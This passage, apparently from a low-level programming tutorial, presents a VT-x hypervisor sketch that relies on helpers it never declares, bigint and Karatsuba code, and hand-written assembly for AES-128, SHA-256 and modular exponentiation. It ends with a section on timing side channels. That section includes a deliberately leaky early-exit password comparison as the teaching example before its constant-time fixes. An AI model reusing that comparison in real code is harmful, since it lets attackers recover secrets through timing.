    GUEST_CR0 = 0x6800,
    GUEST_CR3 = 0x6802,
    GUEST_CR4 = 0x6804,
    GUEST_ES_BASE = 0x6806,
    GUEST_CS_BASE = 0x6808,
    GUEST_SS_BASE = 0x680A,
    GUEST_DS_BASE = 0x680C,
    GUEST_FS_BASE = 0x680E,
    GUEST_GS_BASE = 0x6810,
    GUEST_LDTR_BASE = 0x6812,
    GUEST_TR_BASE = 0x6814,
    GUEST_GDTR_BASE = 0x6816,
    GUEST_IDTR_BASE = 0x6818,
    GUEST_DR7 = 0x681A,
    GUEST_RSP = 0x681C,
    GUEST_RIP = 0x681E,
    GUEST_RFLAGS = 0x6820,
    GUEST_PENDING_DBG_EXCEPTIONS = 0x6822,
    GUEST_SYSENTER_ESP = 0x6824,
    GUEST_SYSENTER_EIP = 0x6826,
    // Natural-width host-state fields
    HOST_CR0 = 0x6C00,
    HOST_CR3 = 0x6C02,
    HOST_CR4 = 0x6C04,
    HOST_FS_BASE = 0x6C06,
    HOST_GS_BASE = 0x6C08,
    HOST_TR_BASE = 0x6C0A,
    HOST_GDTR_BASE = 0x6C0C,
    HOST_IDTR_BASE = 0x6C0E,
    HOST_RSP = 0x6C14,
    HOST_RIP = 0x6C16
};
// hypervisor.c - Minimal VT-x hypervisor
#include <stdint.h>
#include <stdlib.h>
#include <string.h>
// VMX region structures
typedef struct {
uint32_t revision_id;
uint32_t abort_indicator;
uint8_t data[0];
} __attribute__((packed)) vmxon_region_t;
typedef struct {
uint32_t revision_id;
uint8_t data[0];
} __attribute__((packed)) vmcs_t;
// VM-exit information
typedef struct {
uint64_t exit_reason;
uint64_t exit_qualification;
uint64_t guest_linear_address;
uint64_t guest_physical_address;
uint64_t instruction_length;
uint64_t instruction_info;
uint64_t interrupt_info;
uint64_t error_code;
} __attribute__((packed)) vm_exit_info_t;
// Global state
static vmxon_region_t *vmxon_region;
static vmcs_t *vmcs;
static void *vmxon_region_physical;
static void *vmcs_physical;
// Check for VMX support
int vmx_supported(void) {
uint32_t eax, ebx, ecx, edx;
// Check CPUID.1:ECX.VMX bit
__asm__ volatile("cpuid"
: "=a"(eax), "=b"(ebx), "=c"(ecx), "=d"(edx)
: "a"(1));
if (!(ecx & (1 << 5))) {
return 0; // VMX not supported
}
// Check CR4.VMXE bit can be set
uint64_t cr4;
__asm__ volatile("mov %%cr4, %0" : "=r"(cr4));
cr4 |= (1 << 13); // VMXE bit
__asm__ volatile("mov %0, %%cr4" : : "r"(cr4));
__asm__ volatile("mov %%cr4, %0" : "=r"(cr4));
if (!(cr4 & (1 << 13))) {
return 0; // Cannot enable VMX
}
return 1;
}
// Initialize VMX
int vmx_init(void) {
if (!vmx_supported()) {
return -1;
}
// Allocate VMXON region (4KB aligned)
vmxon_region = aligned_alloc(4096, 4096);
if (!vmxon_region) {
return -1;
}
memset(vmxon_region, 0, 4096);
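// Get VMX revision ID from IA32_VMX_BASIC MSR (0x480), bits 30:0
uint32_t msrl, msrh;
__asm__ volatile("rdmsr" : "=a"(msrl), "=d"(msrh) : "c"(0x480));
vmxon_region->revision_id = msrl & 0x7FFFFFFF;
// Store physical address. Masking the virtual address is only valid when
// memory is identity-mapped; otherwise translate through the page tables.
vmxon_region_physical = (void*)((uint64_t)vmxon_region & 0xFFFFFFFFFFFFF000);
// Execute VMXON; the instruction reports failure by setting CF or ZF
uint8_t failed; // SETcc writes an 8-bit register
__asm__ volatile(
"vmxon %[pa]\n"
"setna %[failed]\n"
: [failed] "=q"(failed)
: [pa] "m"(vmxon_region_physical)
: "cc", "memory"
);
if (failed) {
free(vmxon_region);
return -1;
}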
// Allocate VMCS (4KB aligned)
vmcs = aligned_alloc(4096, 4096);
if (!vmcs) {
vmxoff();
free(vmxon_region);
return -1;
}
memset(vmcs, 0, 4096);
vmcs->revision_id = msrl & 0x7FFFFFFF;
vmcs_physical = (void*)((uint64_t)vmcs & 0xFFFFFFFFFFFFF000);
// Clear and load VMCS
__asm__ volatile(
"vmclear %[pa]\n"
"vmptrld %[pa]\n"
:
: [pa] "m"(vmcs_physical)
: "cc", "memory"
);
return 0;
}
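// VM exit handler is defined below; declare it so HOST_RIP can reference it
void vm_exit_handler(void);
// Configure VMCS for guest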
void vmx_setup_guest(void) {
// Host state
uint64_t cr0, cr3, cr4, rsp, rip;
__asm__ volatile("mov %%cr0, %0" : "=r"(cr0));
__asm__ volatile("mov %%cr3, %0" : "=r"(cr3));
__asm__ volatile("mov %%cr4, %0" : "=r"(cr4));
__asm__ volatile("mov %%rsp, %0" : "=r"(rsp));
// Get host RIP (return address after VM exit)
rip = (uint64_t)vm_exit_handler;
// Write host state to VMCS
vmwrite(HOST_CR0, cr0);
vmwrite(HOST_CR3, cr3);
vmwrite(HOST_CR4, cr4);
vmwrite(HOST_RSP, rsp);
vmwrite(HOST_RIP, rip);
// Set up control fields
uint32_t pin_ctls = 0;
uint32_t cpu_ctls = CPU_BASED_HLT_EXITING |
CPU_BASED_CR8_LOAD_EXITING |
CPU_BASED_CR8_STORE_EXITING |
CPU_BASED_USE_MSR_BITMAPS;
vmwrite(PIN_BASED_VM_EXEC_CONTROL, pin_ctls);
vmwrite(CPU_BASED_VM_EXEC_CONTROL, cpu_ctls);
// Set up exit controls
uint32_t exit_ctls = 0;
vmwrite(VM_EXIT_CONTROLS, exit_ctls);
// Set up entry controls
uint32_t entry_ctls = 0;
vmwrite(VM_ENTRY_CONTROLS, entry_ctls);
}
// VM exit handler
void vm_exit_handler(void) {
uint64_t exit_reason;
uint64_t exit_qualification;
// Read exit reason
vmread(VM_EXIT_REASON, &exit_reason);
vmread(EXIT_QUALIFICATION, &exit_qualification);
// Handle different exit reasons
switch (exit_reason & 0xFFFF) {
case 0: // Exception or NMI
handle_exception(exit_qualification);
break;
case 10: // CPUID
handle_cpuid();
break;
case 12: // HLT
handle_hlt();
break;
case 18: // VMCALL
handle_vmcall();
break;
default:
// Unknown exit - just resume
break;
}
// Return to guest
__asm__ volatile("vmresume");
}
// Launch guest
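void vmx_launch_guest(void) {
uint8_t failed; // SETcc writes an 8-bit register
// On success VMLAUNCH transfers control to the guest, so SETNA only
// executes when the launch failed (CF or ZF set)
__asm__ volatile(
"vmlaunch\n"
"setna %[failed]\n"
: [failed] "=q"(failed)
:
: "cc", "memory"
);
if (failed) {
// VM launch failed - check VMCS
uint64_t error;
vmread(VM_INSTRUCTION_ERROR, &error);
printf("VMLAUNCH failed: error %llu\n", (unsigned long long)error);
}
}
// bigint.h - Big integer library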
#include <stdint.h>
#include <stdlib.h>
#include <string.h>
typedef struct {
uint64_t *words; // Array of 64-bit words
size_t size; // Number of words
int sign; // 0 positive, 1 negative
} bigint_t;
// Create new big integer
bigint_t* bigint_new(size_t size) {
bigint_t *bn = malloc(sizeof(bigint_t));
if (!bn) return NULL;
bn->words = calloc(size, sizeof(uint64_t)); // zero-initialized
if (!bn->words && size > 0) {
free(bn);
return NULL;
}
bn->size = size;
bn->sign = 0;
return bn;
}
// Free big integer
void bigint_free(bigint_t *bn) {
free(bn->words);
free(bn);
}
; bigint_add.asm - Big integer addition
; RDI = destination, RSI = first, RDX = second, RCX = word count
; Words are stored least-significant first
; Returns: RAX = carry out of the most significant word (0 or 1)
global bigint_add
bigint_add:
    xor eax, eax            ; return value = 0
    test rcx, rcx
    jz .done                ; nothing to add
    xor r8d, r8d            ; index = 0, also clears CF
.loop:
    mov r9, [rsi + r8*8]    ; load from first
    adc r9, [rdx + r8*8]    ; add second plus carry from previous word
    mov [rdi + r8*8], r9    ; store result
    inc r8                  ; INC and DEC leave CF untouched,
    dec rcx                 ; so the carry survives into the next iteration
    jnz .loop
    setc al                 ; return final carry
.done:
    ret
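A plain C model of the add-with-carry chain is handy for checking an assembly routine such as `bigint_add` word by word. The sketch below assumes words are stored least-significant first; the name `bigint_add_ref` is hypothetical and not part of the library above.

```c
#include <stddef.h>
#include <stdint.h>

/* Reference model (hypothetical helper): dest = a + b over `count` 64-bit
 * words, least-significant word first. Returns the carry out of the top
 * word (0 or 1). */
uint64_t bigint_add_ref(uint64_t *dest, const uint64_t *a,
                        const uint64_t *b, size_t count) {
    uint64_t carry = 0;
    for (size_t i = 0; i < count; i++) {
        uint64_t sum = a[i] + b[i];
        uint64_t c1 = (sum < a[i]);   /* overflow of a[i] + b[i] */
        sum += carry;
        uint64_t c2 = (sum < carry);  /* overflow of adding the carry-in */
        dest[i] = sum;
        carry = c1 | c2;              /* at most one of the two can be set */
    }
    return carry;
}
```

Each unsigned addition is checked for wraparound separately, which is what the hardware carry flag does implicitly for `adc`.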
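; bigint_sub.asm - Big integer subtraction
; RDI = destination, RSI = first, RDX = second, RCX = word count
; Words are stored least-significant first
; Returns: RAX = borrow out of the most significant word (0 or 1)
global bigint_sub
bigint_sub:
    xor eax, eax            ; return value = 0
    test rcx, rcx
    jz .done
    xor r8d, r8d            ; index = 0, also clears CF
.loop:
    mov r9, [rsi + r8*8]
    sbb r9, [rdx + r8*8]    ; subtract second and borrow from previous word
    mov [rdi + r8*8], r9
    inc r8                  ; INC and DEC preserve CF (the borrow)
    dec rcx
    jnz .loop
    setc al                 ; return final borrow
.done:
    ret
// bigint_mul.c - Karatsuba multiplication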
#include "bigint.h"
// Helper: dest += src * 2^(64*offset), propagating the carry through dest.
// A carry out of the top word of dest is dropped, so dest must be large enough.
static void add_shifted(bigint_t *dest, const bigint_t *src, size_t offset) {
    uint64_t carry = 0;
    for (size_t i = 0; i + offset < dest->size; i++) {
        if (i >= src->size && carry == 0) break;   // nothing left to add
        uint64_t s = (i < src->size) ? src->words[i] : 0;
        uint64_t old = dest->words[i + offset];
        uint64_t sum = old + s;
        uint64_t c = (sum < old);                  // overflow of old + s
        sum += carry;
        c |= (sum < carry);                        // overflow of the carry-in
        dest->words[i + offset] = sum;
        carry = c;
    }
}
// Helper: add two big integers
void bigint_add_to(bigint_t *dest, bigint_t *src) {
    add_shifted(dest, src, 0);
}
// Helper: dest -= src with borrow propagation (requires dest >= src)
static void sub_from(bigint_t *dest, const bigint_t *src) {
    uint64_t borrow = 0;
    for (size_t i = 0; i < dest->size; i++) {
        uint64_t s = (i < src->size) ? src->words[i] : 0;
        uint64_t old = dest->words[i];
        dest->words[i] = old - s - borrow;
        borrow = (old < s) || (old == s && borrow);
    }
}
// Helper: copy `count` words of src starting at `from`, zero-padded
static bigint_t* slice(const bigint_t *src, size_t from, size_t count) {
    bigint_t *r = bigint_new(count);
    for (size_t i = 0; i < count && from + i < src->size; i++)
        r->words[i] = src->words[from + i];
    return r;
}
// Multiply two 64-bit words into a 128-bit result (high:low)
static inline void mul64(uint64_t x, uint64_t y, uint64_t *low, uint64_t *high) {
    __asm__("mulq %[y]"
            : "=a"(*low), "=d"(*high)
            : "a"(x), [y] "r"(y)
            : "cc");
}
// Base case: schoolbook multiplication
static bigint_t* mul_schoolbook(const bigint_t *a, const bigint_t *b) {
    bigint_t *r = bigint_new(a->size + b->size);
    for (size_t i = 0; i < a->size; i++) {
        uint64_t carry = 0;
        for (size_t j = 0; j < b->size; j++) {
            uint64_t low, high;
            mul64(a->words[i], b->words[j], &low, &high);
            low += r->words[i + j];
            high += (low < r->words[i + j]);
            low += carry;
            high += (low < carry);
            r->words[i + j] = low;
            carry = high;
        }
        r->words[i + b->size] = carry;
    }
    return r;
}
// Karatsuba multiplication (magnitudes only; allocation checks omitted)
bigint_t* bigint_mul(bigint_t *a, bigint_t *b) {
    size_t n = (a->size > b->size) ? a->size : b->size;
    // Below 4 words the operand sums would not be shorter than n,
    // so the recursion must stop here to terminate
    if (n < 4) return mul_schoolbook(a, b);
    // Split into halves: low = m words, high = n - m words
    size_t m = n / 2;
    bigint_t *a_low = slice(a, 0, m);
    bigint_t *a_high = slice(a, m, n - m);
    bigint_t *b_low = slice(b, 0, m);
    bigint_t *b_high = slice(b, m, n - m);
    // Recursive multiplications
    bigint_t *z0 = bigint_mul(a_low, b_low);
    bigint_t *z2 = bigint_mul(a_high, b_high);
    // (a_low + a_high) * (b_low + b_high); one extra word holds the carry
    bigint_t *a_sum = slice(a_low, 0, n - m + 1);
    bigint_t *b_sum = slice(b_low, 0, n - m + 1);
    add_shifted(a_sum, a_high, 0);
    add_shifted(b_sum, b_high, 0);
    bigint_t *z1 = bigint_mul(a_sum, b_sum);
    // z1 = z1 - z0 - z2
    sub_from(z1, z0);
    sub_from(z1, z2);
    // Combine: result = z0 + (z1 << m words) + (z2 << 2m words)
    bigint_t *result = bigint_new(2 * n);
    add_shifted(result, z0, 0);
    add_shifted(result, z1, m);
    add_shifted(result, z2, 2 * m);
    bigint_free(a_low); bigint_free(a_high);
    bigint_free(b_low); bigint_free(b_high);
    bigint_free(a_sum); bigint_free(b_sum);
    bigint_free(z0); bigint_free(z1); bigint_free(z2);
    return result;
}
; mod_exp.asm - Modular exponentiation (RSA-style)
; RDI = base, RSI = exponent, RDX = modulus
; Returns: (base^exponent) % modulus
global mod_exp
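mod_exp:
    push rbp
    mov rbp, rsp
    push rbx
    push r12
    push r13
    mov r12, rdx            ; modulus (must be nonzero)
    mov rcx, rsi            ; exponent
    ; Reduce the base first so every product below stays under modulus^2
    ; and DIV cannot overflow its 64-bit quotient
    mov rax, rdi
    xor edx, edx
    div r12
    mov rbx, rdx            ; base = base % modulus
    mov r13, 1              ; result = 1
    test rcx, rcx
    jz .done                ; exponent 0: result stays 1
.exp_loop:
    test rcx, 1             ; check LSB of exponent
    jz .skip_mul
    ; result = (result * base) % modulus
    mov rax, r13
    mul rbx                 ; RDX:RAX = result * base
    div r12                 ; RDX = remainder
    mov r13, rdx            ; remainder becomes new result
.skip_mul:
    ; base = (base * base) % modulus
    mov rax, rbx
    mul rbx
    div r12
    mov rbx, rdx
    ; exponent >>= 1
    shr rcx, 1
    jnz .exp_loop
.done:
    mov rax, r13            ; return result
    pop r13
    pop r12
    pop rbx
    pop rbp
    ret
; aes.asm - AES-128 implementation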
section .data
; AES S-box
sbox:
db 0x63,0x7c,0x77,0x7b,0xf2,0x6b,0x6f,0xc5,0x30,0x01,0x67,0x2b,0xfe,0xd7,0xab,0x76
db 0xca,0x82,0xc9,0x7d,0xfa,0x59,0x47,0xf0,0xad,0xd4,0xa2,0xaf,0x9c,0xa4,0x72,0xc0
db 0xb7,0xfd,0x93,0x26,0x36,0x3f,0xf7,0xcc,0x34,0xa5,0xe5,0xf1,0x71,0xd8,0x31,0x15
db 0x04,0xc7,0x23,0xc3,0x18,0x96,0x05,0x9a,0x07,0x12,0x80,0xe2,0xeb,0x27,0xb2,0x75
db 0x09,0x83,0x2c,0x1a,0x1b,0x6e,0x5a,0xa0,0x52,0x3b,0xd6,0xb3,0x29,0xe3,0x2f,0x84
db 0x53,0xd1,0x00,0xed,0x20,0xfc,0xb1,0x5b,0x6a,0xcb,0xbe,0x39,0x4a,0x4c,0x58,0xcf
db 0xd0,0xef,0xaa,0xfb,0x43,0x4d,0x33,0x85,0x45,0xf9,0x02,0x7f,0x50,0x3c,0x9f,0xa8
db 0x51,0xa3,0x40,0x8f,0x92,0x9d,0x38,0xf5,0xbc,0xb6,0xda,0x21,0x10,0xff,0xf3,0xd2
db 0xcd,0x0c,0x13,0xec,0x5f,0x97,0x44,0x17,0xc4,0xa7,0x7e,0x3d,0x64,0x5d,0x19,0x73
db 0x60,0x81,0x4f,0xdc,0x22,0x2a,0x90,0x88,0x46,0xee,0xb8,0x14,0xde,0x5e,0x0b,0xdb
db 0xe0,0x32,0x3a,0x0a,0x49,0x06,0x24,0x5c,0xc2,0xd3,0xac,0x62,0x91,0x95,0xe4,0x79
db 0xe7,0xc8,0x37,0x6d,0x8d,0xd5,0x4e,0xa9,0x6c,0x56,0xf4,0xea,0x65,0x7a,0xae,0x08
db 0xba,0x78,0x25,0x2e,0x1c,0xa6,0xb4,0xc6,0xe8,0xdd,0x74,0x1f,0x4b,0xbd,0x8b,0x8a
db 0x70,0x3e,0xb5,0x66,0x48,0x03,0xf6,0x0e,0x61,0x35,0x57,0xb9,0x86,0xc1,0x1d,0x9e
db 0xe1,0xf8,0x98,0x11,0x69,0xd9,0x8e,0x94,0x9b,0x1e,0x87,0xe9,0xce,0x55,0x28,0xdf
db 0x8c,0xa1,0x89,0x0d,0xbf,0xe6,0x42,0x68,0x41,0x99,0x2d,0x0f,0xb0,0x54,0xbb,0x16
; Round constants
rcon:
db 0x01,0x02,0x04,0x08,0x10,0x20,0x40,0x80,0x1b,0x36
section .text
global aes_encrypt_block
; AES-128 encrypt one block
; RDI = input block (16 bytes)
; RSI = output block (16 bytes)
; RDX = round keys (176 bytes)
aes_encrypt_block:
    push rbp
    mov rbp, rsp
    push rbx
    push r12
    push r13
    push r14
    push r15
    ; Copy input to state (XMM0)
    movdqu xmm0, [rdi]
    ; Initial AddRoundKey
    movdqu xmm1, [rdx]
    pxor xmm0, xmm1
    ; Keep loop state in callee-saved registers so the helper
    ; routines cannot clobber it
    mov r14, rsi            ; output pointer
    mov r12, 9              ; 9 main rounds
    lea r13, [rdx + 16]     ; point to round key 1
.round_loop:
    ; SubBytes - using lookup table
    call sub_bytes
    ; ShiftRows
    call shift_rows
    ; MixColumns
    call mix_columns
    ; AddRoundKey
    movdqu xmm1, [r13]
    pxor xmm0, xmm1
    add r13, 16             ; next round key
    dec r12
    jnz .round_loop
    ; Final round (no MixColumns)
    call sub_bytes
    call shift_rows
    ; Final AddRoundKey
    movdqu xmm1, [r13]
    pxor xmm0, xmm1
    ; Store result
    movdqu [r14], xmm0
    pop r15
    pop r14
    pop r13
    pop r12
    pop rbx
    pop rbp
    ret
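The MixColumns step called in the round loop above multiplies each 4-byte column by a fixed matrix over GF(2^8). As a rough reference for checking an assembly version, the sketch below does one column in C; the function names `xtime` and `mix_single_column` are illustrative choices, not part of the listing.

```c
#include <stdint.h>

/* Multiply by 2 in GF(2^8) with the AES reduction polynomial 0x11b. */
uint8_t xtime(uint8_t x) {
    return (uint8_t)((x << 1) ^ ((x & 0x80) ? 0x1b : 0x00));
}

/* MixColumns on a single column, in place.
 * Row i of the matrix is (02 03 01 01) rotated right by i positions, so
 * out[i] = 2*a[i] ^ 3*a[i+1] ^ a[i+2] ^ a[i+3]
 *        = xtime(a[i] ^ a[i+1]) ^ a[i+1] ^ a[i+2] ^ a[i+3]. */
void mix_single_column(uint8_t col[4]) {
    uint8_t a0 = col[0], a1 = col[1], a2 = col[2], a3 = col[3];
    col[0] = (uint8_t)(xtime(a0 ^ a1) ^ a1 ^ a2 ^ a3);
    col[1] = (uint8_t)(xtime(a1 ^ a2) ^ a2 ^ a3 ^ a0);
    col[2] = (uint8_t)(xtime(a2 ^ a3) ^ a3 ^ a0 ^ a1);
    col[3] = (uint8_t)(xtime(a3 ^ a0) ^ a0 ^ a1 ^ a2);
}
```

Applied to the column `db 13 53 45`, this yields `8e 4d a1 bc`, a commonly quoted MixColumns test vector.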
; SubBytes transformation
; Clobbers RAX, RCX
sub_bytes:
    push rbp
    mov rbp, rsp
    sub rsp, 16             ; scratch space for the state
    ; Process each byte using S-box
    ; Scalar table lookups for demonstration; production code would use
    ; vectorized lookups or AES-NI
    movdqu [rsp], xmm0      ; unaligned store: RSP alignment is not assumed
    xor ecx, ecx
.loop:
    movzx eax, byte [rsp + rcx]
    mov al, [sbox + rax]
    mov [rsp + rcx], al
    inc rcx
    cmp rcx, 16
    jb .loop
    movdqu xmm0, [rsp]
    mov rsp, rbp
    pop rbp
    ret
; ShiftRows transformation
shift_rows:
    ; AES shift rows (state is column-major: byte index = row + 4*column):
    ; Row 0: no shift
    ; Row 1: shift left 1
    ; Row 2: shift left 2
    ; Row 3: shift left 3
    ; Using byte shuffling (PSHUFB requires SSSE3)
    movdqu xmm1, [shift_row_mask] ; unaligned-safe load of the mask
    pshufb xmm0, xmm1
    ret
shift_row_mask:
    db 0x00, 0x05, 0x0a, 0x0f ; output column 0
    db 0x04, 0x09, 0x0e, 0x03 ; output column 1
    db 0x08, 0x0d, 0x02, 0x07 ; output column 2
    db 0x0c, 0x01, 0x06, 0x0b ; output column 3
; MixColumns transformation
; Each column (a0,a1,a2,a3) occupies one dword of XMM0. With r1, r2, r3 the
; column rotated by 1, 2, 3 bytes, the result is
;   xtime(x ^ r1) ^ r1 ^ r2 ^ r3
; Clobbers EAX, XMM1-XMM5
mix_columns:
    movdqa xmm1, xmm0
    movdqa xmm2, xmm0
    psrld xmm1, 8
    pslld xmm2, 24
    por xmm1, xmm2          ; r1 = (a1,a2,a3,a0)
    movdqa xmm2, xmm1
    movdqa xmm3, xmm1
    psrld xmm2, 8
    pslld xmm3, 24
    por xmm2, xmm3          ; r2 = (a2,a3,a0,a1)
    movdqa xmm3, xmm2
    movdqa xmm4, xmm2
    psrld xmm3, 8
    pslld xmm4, 24
    por xmm3, xmm4          ; r3 = (a3,a0,a1,a2)
    pxor xmm2, xmm3
    pxor xmm2, xmm1         ; r1 ^ r2 ^ r3
    pxor xmm0, xmm1         ; x ^ r1
    ; xtime: multiply every byte by 2 in GF(2^8)
    mov eax, 0x1b1b1b1b
    movd xmm5, eax
    pshufd xmm5, xmm5, 0    ; broadcast reduction constant 0x1b
    pxor xmm4, xmm4
    pcmpgtb xmm4, xmm0      ; 0xFF where the high bit is set
    paddb xmm0, xmm0        ; shift each byte left by one
    pand xmm4, xmm5
    pxor xmm0, xmm4         ; reduce bytes that overflowed
    pxor xmm0, xmm2
    ret
; AES-128 Key Expansion
; RDI = key (16 bytes)
; RSI = round keys buffer (176 bytes)
global aes_key_expansion
aes_key_expansion:
    push rbp
    mov rbp, rsp
    push rbx
    ; Copy original key to first 16 bytes
    movdqu xmm0, [rdi]
    movdqu [rsi], xmm0
    ; Generate remaining round keys
    xor r8d, r8d            ; round index 0..9 (selects Rcon)
    mov rbx, 4              ; word index
.key_exp_loop:
    ; Get previous word
    mov eax, [rsi + rbx*4 - 4]
    ; RotWord: bytes are little-endian in EAX, so rotate right
    ror eax, 8
    ; SubWord
    call sub_word
    ; XOR with Rcon (applies to the first byte of the word)
    movzx edx, byte [rcon + r8]
    xor eax, edx
    ; XOR with word from 4 positions back
    xor eax, [rsi + rbx*4 - 16]
    ; Store
    mov [rsi + rbx*4], eax
    inc rbx
    ; Generate remaining 3 words of this round
    mov ecx, 3
.gen_word:
    mov eax, [rsi + rbx*4 - 4]
    xor eax, [rsi + rbx*4 - 16]
    mov [rsi + rbx*4], eax
    inc rbx
    dec ecx
    jnz .gen_word
    inc r8
    cmp r8, 10              ; 10 rounds
    jb .key_exp_loop
    pop rbx
    pop rbp
    ret
; Substitute each byte of EAX using S-box
; Clobbers ECX, EDX
sub_word:
    mov ecx, 4
.next_byte:
    movzx edx, al
    mov al, [sbox + rdx]    ; substitute the low byte
    ror eax, 8              ; bring the next byte into AL
    dec ecx
    jnz .next_byte          ; four rotations restore the byte order
    ret
; sha256.asm - SHA-256 implementation
section .data
; SHA-256 initial hash values
h0 dd 0x6a09e667
h1 dd 0xbb67ae85
h2 dd 0x3c6ef372
h3 dd 0xa54ff53a
h4 dd 0x510e527f
h5 dd 0x9b05688c
h6 dd 0x1f83d9ab
h7 dd 0x5be0cd19
; SHA-256 round constants
k:
dd 0x428a2f98, 0x71374491, 0xb5c0fbcf, 0xe9b5dba5
dd 0x3956c25b, 0x59f111f1, 0x923f82a4, 0xab1c5ed5
dd 0xd807aa98, 0x12835b01, 0x243185be, 0x550c7dc3
dd 0x72be5d74, 0x80deb1fe, 0x9bdc06a7, 0xc19bf174
dd 0xe49b69c1, 0xefbe4786, 0x0fc19dc6, 0x240ca1cc
dd 0x2de92c6f, 0x4a7484aa, 0x5cb0a9dc, 0x76f988da
dd 0x983e5152, 0xa831c66d, 0xb00327c8, 0xbf597fc7
dd 0xc6e00bf3, 0xd5a79147, 0x06ca6351, 0x14292967
dd 0x27b70a85, 0x2e1b2138, 0x4d2c6dfc, 0x53380d13
dd 0x650a7354, 0x766a0abb, 0x81c2c92e, 0x92722c85
dd 0xa2bfe8a1, 0xa81a664b, 0xc24b8b70, 0xc76c51a3
dd 0xd192e819, 0xd6990624, 0xf40e3585, 0x106aa070
dd 0x19a4c116, 0x1e376c08, 0x2748774c, 0x34b0bcb5
dd 0x391c0cb3, 0x4ed8aa4a, 0x5b9cca4f, 0x682e6ff3
dd 0x748f82ee, 0x78a5636f, 0x84c87814, 0x8cc70208
dd 0x90befffa, 0xa4506ceb, 0xbef9a3f7, 0xc67178f2
section .text
global sha256_transform
; SHA-256 transform function
; RDI = state (8 dwords)
; RSI = block (64 bytes)
sha256_transform:
    push rbp
    mov rbp, rsp
    push rbx
    push r12
    push r13
    push r14
    push r15
    sub rsp, 256            ; w[0..63], allocated below the saved registers
    ; Initialize working variables a-h
    mov r8d, [rdi]          ; a
    mov r9d, [rdi+4]        ; b
    mov r10d, [rdi+8]       ; c
    mov r11d, [rdi+12]      ; d
    mov r12d, [rdi+16]      ; e
    mov r13d, [rdi+20]      ; f
    mov r14d, [rdi+24]      ; g
    mov r15d, [rdi+28]      ; h
    ; Copy block to w[0..15] (big-endian to host)
    xor ecx, ecx
.prep_loop:
    mov eax, [rsi + rcx*4]
    bswap eax               ; convert from big-endian
    mov [rsp + rcx*4], eax
    inc ecx
    cmp ecx, 16
    jl .prep_loop
    ; Main loop: for t = 0 to 63 (t in RCX)
    xor ecx, ecx
.main_loop:
    ; Prepare message schedule for t >= 16
    cmp ecx, 16
    jl .skip_schedule
    ; w[t] = sigma1(w[t-2]) + w[t-7] + sigma0(w[t-15]) + w[t-16]
    mov eax, [rsp + rcx*4 - 8]
    call sigma1
    mov ebx, eax
    add ebx, [rsp + rcx*4 - 28]
    mov eax, [rsp + rcx*4 - 60]
    call sigma0
    add ebx, eax
    add ebx, [rsp + rcx*4 - 64]
    mov [rsp + rcx*4], ebx
.skip_schedule:
    ; T1 = h + Sigma1(e) + Ch(e,f,g) + k[t] + w[t]
    mov eax, r12d
    call Sigma1
    add eax, r15d           ; + h
    ; Ch(e,f,g) = (e & f) ^ (~e & g)
    mov ebx, r12d
    and ebx, r13d
    mov edx, r12d
    not edx
    and edx, r14d
    xor ebx, edx
    add eax, ebx
    add eax, [k + rcx*4]    ; + k[t]
    add eax, [rsp + rcx*4]  ; + w[t]
    mov esi, eax            ; T1 in esi (block pointer no longer needed)
    ; T2 = Sigma0(a) + Maj(a,b,c)
    mov eax, r8d
    call Sigma0
    ; Maj(a,b,c) = (a & b) ^ (a & c) ^ (b & c)
    mov ebx, r8d
    and ebx, r9d
    mov edx, r8d
    and edx, r10d
    xor ebx, edx
    mov edx, r9d
    and edx, r10d
    xor ebx, edx
    add eax, ebx            ; T2 in eax
    ; Update registers
    mov r15d, r14d          ; h = g
    mov r14d, r13d          ; g = f
    mov r13d, r12d          ; f = e
    mov r12d, r11d
    add r12d, esi           ; e = d + T1
    mov r11d, r10d          ; d = c
    mov r10d, r9d           ; c = b
    mov r9d, r8d            ; b = a
    mov r8d, esi
    add r8d, eax            ; a = T1 + T2
    inc ecx
    cmp ecx, 64
    jl .main_loop
    ; Add results to state
    add [rdi], r8d
    add [rdi+4], r9d
    add [rdi+8], r10d
    add [rdi+12], r11d
    add [rdi+16], r12d
    add [rdi+20], r13d
    add [rdi+24], r14d
    add [rdi+28], r15d
    add rsp, 256
    pop r15
    pop r14
    pop r13
    pop r12
    pop rbx
    pop rbp
    ret
; The four helpers take x in EAX, return the result in EAX, and clobber EDX
; Sigma0(x) = ROTR(x,2) ^ ROTR(x,13) ^ ROTR(x,22)
Sigma0:
    mov edx, eax
    ror eax, 2
    ror edx, 13
    xor eax, edx
    ror edx, 9              ; 13 + 9 = 22 in total
    xor eax, edx
    ret
; Sigma1(x) = ROTR(x,6) ^ ROTR(x,11) ^ ROTR(x,25)
Sigma1:
    mov edx, eax
    ror eax, 6
    ror edx, 11
    xor eax, edx
    ror edx, 14             ; 11 + 14 = 25 in total
    xor eax, edx
    ret
; sigma0(x) = ROTR(x,7) ^ ROTR(x,18) ^ SHR(x,3) (message schedule)
sigma0:
    mov edx, eax
    shr eax, 3
    ror edx, 7
    xor eax, edx
    ror edx, 11             ; 7 + 11 = 18 in total
    xor eax, edx
    ret
; sigma1(x) = ROTR(x,17) ^ ROTR(x,19) ^ SHR(x,10) (message schedule)
sigma1:
    mov edx, eax
    shr eax, 10
    ror edx, 17
    xor eax, edx
    ror edx, 2              ; 17 + 2 = 19 in total
    xor eax, edx
    ret
Cryptographic code must avoid timing side channels: execution time and memory access patterns must not depend on secret data.
Vulnerable Code
// Timing leaks! Different paths take different time
#include <stddef.h>
int check_password(const char *user, const char *expected, size_t len) {
for (size_t i = 0; i < len; i++) {
if (user[i] != expected[i]) {
return 0; // Early exit leaks the position of the first mismatch
}
}
return 1;
}
Constant-Time Comparison
; constant_time_cmp.asm - Compare without early exit
; RDI = buffer1, RSI = buffer2, RDX = length
; Returns 0 if equal, non-zero if different
global constant_time_cmp
constant_time_cmp:
    xor eax, eax            ; result = 0
    test rdx, rdx
    jz .done                ; zero-length buffers compare equal
    xor ecx, ecx            ; counter
.loop:
    ; Load bytes
    movzx r8d, byte [rdi + rcx]
    movzx r9d, byte [rsi + rcx]
    ; XOR and OR into result
    xor r8d, r9d
    or eax, r8d
    inc rcx
    cmp rcx, rdx
    jb .loop                ; unsigned compare; the length is not secret
.done:
    ; Return (0 if all bytes equal)
    ret
Constant-Time Select
; constant_time_select.asm - Choose between two values without branching
; RDI = condition (0 or 1), RSI = val_if_true, RDX = val_if_false
; Returns selected value
global constant_time_select
constant_time_select:
; Create mask: if condition, mask = 0xFFFFFFFFFFFFFFFF
neg rdi
sbb rdi, rdi
; (mask & val_if_true) | (~mask & val_if_false)
mov rax, rdi
and rax, rsi
not rdi
and rdi, rdx
or rax, rdi
ret
Constant-Time AES S-box
